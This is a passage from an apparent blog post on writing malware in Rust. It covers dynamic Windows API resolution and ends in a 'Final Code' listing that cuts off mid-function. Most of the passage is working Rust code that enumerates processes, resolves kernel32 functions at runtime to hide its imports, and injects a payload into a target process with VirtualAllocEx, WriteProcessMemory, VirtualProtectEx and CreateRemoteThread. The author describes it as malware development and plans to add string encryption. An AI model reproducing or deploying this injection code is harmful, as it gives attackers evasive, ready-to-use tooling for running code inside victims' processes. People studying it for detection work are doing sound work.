src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img12.png" alt="Screenshot" /> <em><center>Figure 12 - GetProcAddress CloseHandle Debug</center></em></p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img13.png" alt="Screenshot" /> <em><center>Figure 13 - GetProcAddress OpenProcess Debug</center></em></p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img14.png" alt="Screenshot" /> <em><center>Figure 14 - GetProcAddress VirtualAllocEx Debug</center></em></p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img15.png" alt="Screenshot" /> <em><center>Figure 15 - GetProcAddress WriteProcessMemory Debug</center></em></p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img16.png" alt="Screenshot" /> <em><center>Figure 16 - GetProcAddress VirtualProtectEx Debug</center></em></p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img17.png" alt="Screenshot" /> <em><center>Figure 17 - GetProcAddress CreateRemoteThread Debug</center></em></p> <p>We can see that our binary correctly resolved all the WinAPIs addresses.</p> <p><img src="/assets/images/2023-11-20-rustware-part-3-dynamic-api-resolution/img18.png" alt="Screenshot" /> <em><center>Figure 18 - Process Injection Debug</center></em></p> <h2 id="conclusion">Conclusion</h2> <p>Rust is a very powerful language; in the last years it found its way into the malware development, especially for ransomware because of its speed. The interaction with WinAPIs is not very easy because of the datatype mismatch.</p> <p>I had several problems to define the correct function pointer type because I wasn’t defining it as <strong>external “system”</strong> and it wasn’t working.</p> <p>The next steps are to encrypt all the strings and implement a custom version of <strong>GetModuleHandle</strong> and <strong>GetProcAddress</strong>.</p> <p>Feel free to contact me, I’d appreciate any feedback.</p> <h2 id="references">References</h2> <ul> <li><a href="https://learn.microsoft.com/en-us/windows/dev-environment/rust/">https://learn.microsoft.com/en-us/windows/dev-environment/rust/</a></li> <li><a href="https://microsoft.github.io/windows-docs-rs/doc/windows/">https://microsoft.github.io/windows-docs-rs/doc/windows/</a></li> <li><a href="https://socradar.io/why-ransomware-groups-switch-to-rust-programming-language/">https://socradar.io/why-ransomware-groups-switch-to-rust-programming-language/</a></li> <li><a href="https://crates.io/crates/windows">https://crates.io/crates/windows</a></li> <li><a href="https://doc.rust-lang.org/book/">https://doc.rust-lang.org/book/</a></li> <li><a href="https://www.ired.team/offensive-security/code-injection-process-injection/process-injection">https://www.ired.team/offensive-security/code-injection-process-injection/process-injection</a></li> <li><a href="https://institute.sektor7.net">https://institute.sektor7.net</a></li> <li><a href="https://maldevacademy.com">https://maldevacademy.com</a></li> <li><a href="https://syrion.me/malware/rustware-part-2-process-enumeration-development/">https://syrion.me/malware/rustware-part-2-process-enumeration-development/</a></li> <li><a href="https://attack.mitre.org/techniques/T1027/007/">https://attack.mitre.org/techniques/T1027/007/</a></li> </ul> <h2 id="final-code">Final Code</h2> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::{</span> <span class="nn">ffi</span><span class="p">::</span><span class="nb">c_void</span><span class="p">,</span> <span class="nn">mem</span><span class="p">::{</span><span class="n">size_of</span><span class="p">,</span> <span class="n">transmute</span><span class="p">},</span> <span class="nn">ptr</span><span class="p">::</span><span class="n">null_mut</span><span class="p">,</span> <span class="p">};</span> <span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="n">null</span><span class="p">;</span> <span class="k">use</span> <span class="nn">windows</span><span class="p">::{</span> <span class="nn">core</span><span class="p">::{</span><span class="n">Error</span><span class="p">,</span> <span class="n">HRESULT</span><span class="p">,</span> <span class="n">HSTRING</span><span class="p">,</span> <span class="n">PCSTR</span><span class="p">},</span> <span class="nn">Win32</span><span class="p">::{</span> <span class="nn">Foundation</span><span class="p">::</span><span class="n">BOOL</span><span class="p">,</span> <span class="nn">Foundation</span><span class="p">::</span><span class="n">HANDLE</span><span class="p">,</span> <span class="nn">Foundation</span><span class="p">::</span><span class="n">HMODULE</span><span class="p">,</span> <span class="nn">Security</span><span class="p">::</span><span class="n">SECURITY_ATTRIBUTES</span><span class="p">,</span> <span class="nn">System</span><span class="p">::{</span> <span class="nn">Diagnostics</span><span class="p">::</span><span class="nn">ToolHelp</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">LibraryLoader</span><span class="p">::{</span><span class="n">GetModuleHandleA</span><span class="p">,</span> <span class="n">GetProcAddress</span><span class="p">},</span> <span class="nn">Memory</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">Threading</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="p">},</span> <span class="p">},</span> <span class="p">};</span> <span class="k">type</span> <span class="n">CreateToolhelp32SnapshotFunc</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">CREATE_TOOLHELP_SNAPSHOT_FLAGS</span><span class="p">,</span> <span class="nb">u32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">HANDLE</span><span class="p">;</span> <span class="k">type</span> <span class="n">Process32FirstFunc</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">HANDLE</span><span class="p">,</span> <span class="o">*</span><span class="k">mut</span> <span class="n">PROCESSENTRY32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">BOOL</span><span class="p">;</span> <span class="k">type</span> <span class="n">Process32NextFunc</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">HANDLE</span><span class="p">,</span> <span class="o">*</span><span class="k">mut</span> <span class="n">PROCESSENTRY32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">BOOL</span><span class="p">;</span> <span class="k">type</span> <span class="n">OpenProcessFunc</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">PROCESS_ACCESS_RIGHTS</span><span class="p">,</span> <span class="nb">bool</span><span class="p">,</span> <span class="nb">u32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">HANDLE</span><span class="p">;</span> <span class="k">type</span> <span class="n">CloseHandleFunc</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">HANDLE</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">BOOL</span><span class="p">;</span> <span class="k">type</span> <span class="n">VirtualAlloExFunc</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span> <span class="n">HANDLE</span><span class="p">,</span> <span class="o">*</span><span class="k">const</span> <span class="p">::</span><span class="nn">core</span><span class="p">::</span><span class="nn">ffi</span><span class="p">::</span><span class="nb">c_void</span><span class="p">,</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">VIRTUAL_ALLOCATION_TYPE</span><span class="p">,</span> <span class="n">PAGE_PROTECTION_FLAGS</span><span class="p">,</span> <span class="p">)</span> <span class="k">-&gt;</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span><span class="p">;</span> <span class="k">type</span> <span class="n">WriteProcessMemoryFunc</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span><span class="n">HANDLE</span><span class="p">,</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">,</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">,</span> <span class="nb">usize</span><span class="p">,</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">BOOL</span><span class="p">;</span> <span class="k">type</span> <span class="n">VirtualProtectExFunc</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span> <span class="n">HANDLE</span><span class="p">,</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">,</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">PAGE_PROTECTION_FLAGS</span><span class="p">,</span> <span class="o">*</span><span class="k">mut</span> <span class="n">PAGE_PROTECTION_FLAGS</span><span class="p">,</span> <span class="p">)</span> <span class="k">-&gt;</span> <span class="n">BOOL</span><span class="p">;</span> <span class="k">type</span> <span class="n">CreateRemoteThreadFunc</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">(</span> <span class="n">HANDLE</span><span class="p">,</span> <span class="o">*</span><span class="k">const</span> <span class="n">SECURITY_ATTRIBUTES</span><span class="p">,</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">LPTHREAD_START_ROUTINE</span><span class="p">,</span> <span class="o">*</span><span class="k">const</span> <span class="p">::</span><span class="nn">core</span><span class="p">::</span><span class="nn">ffi</span><span class="p">::</span><span class="nb">c_void</span><span class="p">,</span> <span class="nb">u32</span><span class="p">,</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u32</span><span class="p">,</span> <span class="p">)</span> <span class="k">-&gt;</span> <span class="n">HANDLE</span><span class="p">;</span> <span class="k">fn</span> <span class="nf">resolve_api</span><span class="p">(</span> <span class="n">module_handle</span><span class="p">:</span> <span class="n">HMODULE</span><span class="p">,</span> <span class="n">api_name</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">,</span> <span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">unsafe</span> <span class="k">extern</span> <span class="s">"system"</span> <span class="k">fn</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">isize</span><span class="p">,</span> <span class="n">Error</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="k">match</span> <span class="nf">GetProcAddress</span><span class="p">(</span><span class="n">module_handle</span><span class="p">,</span> <span class="nn">PCSTR</span><span class="p">::</span><span class="nf">from_raw</span><span class="p">(</span><span class="n">api_name</span><span class="nf">.as_ptr</span><span class="p">()))</span> <span class="p">{</span> <span class="nf">Some</span><span class="p">(</span><span class="n">winapi_addr</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">winapi_addr</span><span class="p">);</span> <span class="p">}</span> <span class="nb">None</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"GetProcAddress Error"</span><span class="p">),</span> <span class="p">));</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="k">fn</span> <span class="nf">find_pid</span><span class="p">(</span><span class="n">target_process_name</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">u32</span><span class="p">,</span> <span class="n">Error</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">pe32</span><span class="p">:</span> <span class="n">PROCESSENTRY32</span> <span class="o">=</span> <span class="n">PROCESSENTRY32</span> <span class="p">{</span> <span class="o">..</span><span class="nn">Default</span><span class="p">::</span><span class="nf">default</span><span class="p">()</span> <span class="p">};</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">cur_process_name</span><span class="p">;</span> <span class="k">let</span> <span class="n">create_toolhelp32_snapshot</span><span class="p">:</span> <span class="n">CreateToolhelp32SnapshotFunc</span><span class="p">;</span> <span class="k">let</span> <span class="n">process32_first</span><span class="p">:</span> <span class="n">Process32FirstFunc</span><span class="p">;</span> <span class="k">let</span> <span class="n">process32_next</span><span class="p">:</span> <span class="n">Process32NextFunc</span><span class="p">;</span> <span class="k">let</span> <span class="n">close_handle</span><span class="p">:</span> <span class="n">CloseHandleFunc</span><span class="p">;</span> <span class="n">pe32</span><span class="py">.dwSize</span> <span class="o">=</span> <span class="nn">size_of</span><span class="p">::</span><span class="o">&lt;</span><span class="n">PROCESSENTRY32</span><span class="o">&gt;</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">;</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="k">let</span> <span class="n">kernel32_module_handle</span><span class="p">:</span> <span class="n">HMODULE</span> <span class="o">=</span> <span class="nf">GetModuleHandleA</span><span class="p">(</span><span class="nn">PCSTR</span><span class="p">::</span><span class="nf">from_raw</span><span class="p">(</span><span class="s">"kernel32.dll</span><span class="se">\0</span><span class="s">"</span><span class="nf">.as_ptr</span><span class="p">()))</span><span class="o">?</span><span class="p">;</span> <span class="n">create_toolhelp32_snapshot</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span> <span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"CreateToolhelp32Snapshot</span><span class="se">\0</span><span class="s">"</span><span class="p">,</span> <span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">process32_first</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"Process32First</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">process32_next</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"Process32Next</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">close_handle</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"CloseHandle</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="cm">/* CreateToolhelp32Snapshot */</span> <span class="k">let</span> <span class="n">handle_procsnap</span> <span class="o">=</span> <span class="nf">create_toolhelp32_snapshot</span><span class="p">(</span><span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="k">if</span> <span class="n">handle_procsnap</span><span class="nf">.is_invalid</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"CreateToolhelp32Snapshot Error"</span><span class="p">),</span> <span class="p">));</span> <span class="p">}</span> <span class="cm">/* Process32First */</span> <span class="k">if</span> <span class="nf">process32_first</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">pe32</span><span class="p">)</span> <span class="o">==</span> <span class="k">false</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"Process32First Error"</span><span class="p">),</span> <span class="p">));</span> <span class="p">}</span> <span class="k">loop</span> <span class="p">{</span> <span class="n">cur_process_name</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">str</span><span class="p">::</span><span class="nf">from_utf8</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pe32</span><span class="py">.szExeFile</span><span class="p">)</span> <span class="nf">.unwrap</span><span class="p">()</span> <span class="nf">.trim_matches</span><span class="p">(</span><span class="nn">char</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span> <span class="k">if</span> <span class="n">cur_process_name</span><span class="nf">.to_lowercase</span><span class="p">()</span> <span class="o">==</span> <span class="n">target_process_name</span><span class="nf">.to_lowercase</span><span class="p">()</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Find {target_process_name} PID: {}"</span><span class="p">,</span> <span class="n">pe32</span><span class="py">.th32ProcessID</span><span class="p">);</span> <span class="k">if</span> <span class="nf">close_handle</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">)</span><span class="nf">.as_bool</span><span class="p">()</span> <span class="o">==</span> <span class="k">false</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"CloseHandle Error"</span><span class="p">)));</span> <span class="p">}</span> <span class="k">return</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">pe32</span><span class="py">.th32ProcessID</span><span class="p">);</span> <span class="p">}</span> <span class="n">pe32</span><span class="py">.szExeFile</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">;</span> <span class="mi">260</span><span class="p">];</span> <span class="cm">/* Process32Next */</span> <span class="k">if</span> <span class="nf">process32_next</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">pe32</span><span class="p">)</span> <span class="o">==</span> <span class="k">false</span> <span class="p">{</span> <span class="k">if</span> <span class="nf">close_handle</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">)</span><span class="nf">.as_bool</span><span class="p">()</span> <span class="o">==</span> <span class="k">false</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"CloseHandle Error"</span><span class="p">)));</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="nf">Ok</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="p">}</span> <span class="k">fn</span> <span class="nf">inject</span><span class="p">(</span><span class="n">pid</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="n">payload_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(),</span> <span class="n">Error</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">lp_number_of_bytes_written</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">usize</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">null_mut</span><span class="p">();</span> <span class="k">let</span> <span class="n">_lp_thread_id</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u32</span><span class="p">;</span> <span class="k">let</span> <span class="n">_lp_parameter</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">;</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">old_protect</span><span class="p">:</span> <span class="n">PAGE_PROTECTION_FLAGS</span> <span class="o">=</span> <span class="nf">PAGE_PROTECTION_FLAGS</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="k">let</span> <span class="n">virtual_alloc_ex</span><span class="p">:</span> <span class="n">VirtualAlloExFunc</span><span class="p">;</span> <span class="k">let</span> <span class="n">write_process_memory</span><span class="p">:</span> <span class="n">WriteProcessMemoryFunc</span><span class="p">;</span> <span class="k">let</span> <span class="n">virtual_protect_ex</span><span class="p">:</span> <span class="n">VirtualProtectExFunc</span><span class="p">;</span> <span class="k">let</span> <span class="n">create_remote_thread</span><span class="p">:</span> <span class="n">CreateRemoteThreadFunc</span><span class="p">;</span> <span class="k">let</span> <span class="n">close_handle</span><span class="p">:</span> <span class="n">CloseHandleFunc</span><span class="p">;</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="k">let</span> <span class="n">kernel32_module_handle</span><span class="p">:</span> <span class="n">HMODULE</span> <span class="o">=</span> <span class="nf">GetModuleHandleA</span><span class="p">(</span><span class="nn">PCSTR</span><span class="p">::</span><span class="nf">from_raw</span><span class="p">(</span><span class="s">"kernel32.dll</span><span class="se">\0</span><span class="s">"</span><span class="nf">.as_ptr</span><span class="p">()))</span><span class="o">?</span><span class="p">;</span> <span class="k">let</span> <span class="n">open_process</span><span class="p">:</span> <span class="n">OpenProcessFunc</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"OpenProcess</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">virtual_alloc_ex</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"VirtualAllocEx</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">write_process_memory</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"WriteProcessMemory</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">virtual_protect_ex</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"VirtualProtectEx</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">create_remote_thread</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"CreateRemoteThread</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="n">close_handle</span> <span class="o">=</span> <span class="nf">transmute</span><span class="p">(</span><span class="nf">resolve_api</span><span class="p">(</span><span class="n">kernel32_module_handle</span><span class="p">,</span> <span class="s">"CloseHandle</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span><span class="o">?</span><span class="p">);</span> <span class="cm">/* OpenProcess */</span> <span class="k">let</span> <span class="n">handle_process</span><span class="p">:</span> <span class="n">HANDLE</span> <span class="o">=</span> <span class="nf">open_process</span><span class="p">(</span><span class="n">PROCESS_ALL_ACCESS</span><span class="p">,</span> <span class="k">false</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span> <span class="k">if</span> <span class="n">handle_process</span><span class="nf">.is_invalid</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"OpenProcess Error"</span><span class="p">)));</span> <span class="p">}</span> <span class="cm">/* VirtualAllocEx */</span> <span class="k">let</span> <span class="n">remote_memory_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span> <span class="o">=</span> <span class="nf">virtual_alloc_ex</span><span class="p">(</span> <span class="n">handle_process</span><span class="p">,</span> <span class="nf">null</span><span class="p">(),</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_READWRITE</span><span class="p">,</span> <span class="p">);</span> <span class="k">if</span> <span class="n">remote_memory_ptr</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"VirtualAllocEx Error"</span><span class="p">),</span> <span class="p">));</span> <span class="p">}</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Allocated Memory Address: {:p}"</span><span class="p">,</span> <span class="n">remote_memory_ptr</span><span class="p">);</span> <span class="cm">/* WriteProcessMemory */</span> <span class="k">if</span> <span class="nf">write_process_memory</span><span class="p">(</span> <span class="n">handle_process</span><span class="p">,</span> <span class="n">remote_memory_ptr</span><span class="p">,</span> <span class="n">payload_ptr</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">lp_number_of_bytes_written</span><span class="p">,</span> <span class="p">)</span> <span class="o">==</span> <span class="k">false</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"WriteProcessMemory Error"</span><span class="p">),</span> <span class="p">));</span> <span class="p">}</span> <span class="cm">/* VirtualProtectEx */</span> <span class="k">if</span> <span class="nf">virtual_protect_ex</span><span class="p">(</span> <span class="n">handle_process</span><span class="p">,</span> <span class="n">remote_memory_ptr</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READ</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">old_protect</span><span class="p">,</span> <span class="p">)</span> <span class="o">==</span> <span class="k">false</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"VirtualProtectEx Error"</span><span class="p">),</span> <span class="p">));</span> <span class="p">}</span> <span class="cm">/* CreateRemoteThread */</span> <span class="k">let</span> <span class="n">handle_tread</span> <span class="o">=</span> <span class="nf">create_remote_thread</span><span class="p">(</span> <span class="n">handle_process</span><span class="p">,</span> <span class="nf">transmute</span><span class="p">(::</span><span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nn">null</span><span class="p">::</span><span class="o">&lt;</span><span class="n">SECURITY_ATTRIBUTES</span><span class="o">&gt;</span><span class="p">()),</span> <span class="nf">transmute</span><span class="p">(</span><span class="nn">null</span><span class="p">::</span><span class="o">&lt;</span><span class="nb">usize</span><span class="o">&gt;</span><span class="p">()),</span> <span class="nf">transmute</span><span class="p">(</span><span class="n">remote_memory_ptr</span><span class="p">),</span> <span class="nf">null</span><span class="p">(),</span> <span class="nf">transmute</span><span class="p">(</span><span class="nn">null</span><span class="p">::</span><span class="o">&lt;</span><span class="nb">u32</span><span class="o">&gt;</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">),</span> <span class="nf">null_mut</span><span class="p">(),</span> <span class="p">);</span> <span class="k">if</span> <span class="n">handle_tread</span><span class="nf">.is_invalid</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span> <span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"VirtualProtectEx Error"</span><span class="p">),</span> <span class="p">));</span> <span class="p">}</span> <span class="cm">/* CloseHandle */</span> <span class="k">if</span> <span class="nf">close_handle</span><span class="p">(</span><span class="n">handle_process</span><span class="p">)</span><span class="nf">.as_bool</span><span class="p">()</span> <span class="o">==</span> <span class="k">false</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nf">HRESULT</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="nn">HSTRING</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"CloseHandle Error"</span><span class="p">)));</span> <span class="p">}</span> <span class="k">if</span> <span class="nf">close_handle</span><span class="p">(</span><span class="n">handle_tread</span><span class="p">)</span><span 